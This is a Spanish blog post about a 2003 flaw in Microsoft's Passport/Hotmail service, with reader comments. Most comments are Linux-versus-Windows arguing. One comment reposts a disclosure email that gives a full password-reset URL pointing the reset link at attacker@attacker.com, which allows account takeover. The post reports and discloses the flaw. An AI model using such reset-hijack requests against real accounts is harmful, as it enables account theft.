Fallo de seguridad en Passport

Según aparece en LIbertad Digital, se ha descubierto un nuevo fallo de seguridad en Microsoft, esta vez en su servicio Passport, que teoricamente deberia ser inviolable, si lo quieren dedicar a autentificar transacciones comerciales, pero que solo le ha durado cuatro minutos a un consultor de seguridad paquistaní antes de descubrir el susodicho fallo que, con perdón de la expresión, dejaba con el culo al aire a millones de usuarios. Al final va a parecer que le tenemos mania a Microsoft, pero es que hay cosas que son imperdonables.

Categorias: Internacional

Etiquetas:

7s Comentarios

  1. Haver nene que te crees que los de microsoft son perfectos o que? mira callate la boca porque fijo que linux tiene miles de fallos , como no les interesa a ala gente investigar no los investigan pa k con lo mierda k es..
  2. Copio literalmente un mail que he leido por unos foros:

    —–Original Message—–

    From: Muhammad Faisal Rauf Danka [mailto:mfrd@attitudex.com] Sent: Thursday, May 08, 2003 8:46 AM To: admin@zone-h.org Subject: Hotmail & Passport (.NET Accounts) Vulnerability

    There is a very serious and stupid vulnerability or badcoding in Hotmail / Passport’s (.NET Accounts)

    I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.

    I guess I don’t need to go in details of how cruical and important Hotmail / Passport’s .NET Account passport is to anyone.

    You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.

    It is so simple that it is funny.

    All you got to do is hit the following in your browser:

    https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

    And you’ll get an email on attacker@attacker.com asking you to click on a url something like this:

    http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033

    From that url, you can reset the password and I don’t think I need to say anything more about it.

    Vulnerability / Flaw discovered : 12th April 2003 Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)

    Regards ——– Muhammad Faisal Rauf Danka

  3. Lo de que linux también tiene bugs es totalmente correcto. No existe nigún sistema 100% seguro, eso está claro. Pero sin duda linux, y plataformas unix, son más seguras que windows por el mero hecho de que 1000 ojos ven mas que 2 ;).

    Un saludo

    Hard_007

  4. [n] [quote] Pero sin duda linux, y plataformas unix, son más seguras que windows por el mero hecho de que 1000 ojos ven mas que 2 ;). [/quote] [/n]

    Coño, díselo a las moscas…

  5. Mira, yo que tú, primero aprenderia a escribir , despues tendria un poco de respeto por las opiniones de los demas, y en tercer y ultimo lugar, si no te interesa la opinión, simplemente pasa de ella. En cuanto al tratamiento de nene, no se si darte las gracias o simplemente pasar de un individuo como tu que no es capaz de poner siquiera su nick para que se sepa quien es. Un saludo a todos menos a uno PPPPPPP
  6. Como no, un aDeSeLeTeRo para expresarse así, ¿no serás el Sr. Gates?

    Pues bueno, Sr. Gates, respondiendo a tus dudas:

    – Linux tiene fallos y son corregidos en horas. El último más grave fué corregido antes de salir a la luz.

    – Linux no tiene secretos. Su código fuente está al descubierto y cualquiera puede manipularlo a su gusto (o corregir lo que le parezca).

    – Internet es dominado por sistemas Unix, y nunca son los causantes de los fallos en la red. El último gusano que paralizó un gran número de servidores root fué por un falló en una aplicación de MS (menos mal que MS no domina internet).

    Así que "nene", con estos datos y buscando un poquito en internet, lo mismo conozcas un poco más este mundo y no digas tantas tonterías con esa "boquita", mejor dicho, esos deditos.

  7. tengo cuenta en hotmil,y me robaron la contraseña,pero necesito recuperarla,q puedo hacer????????cualquier informacion mandarla a esta direccion

    nadia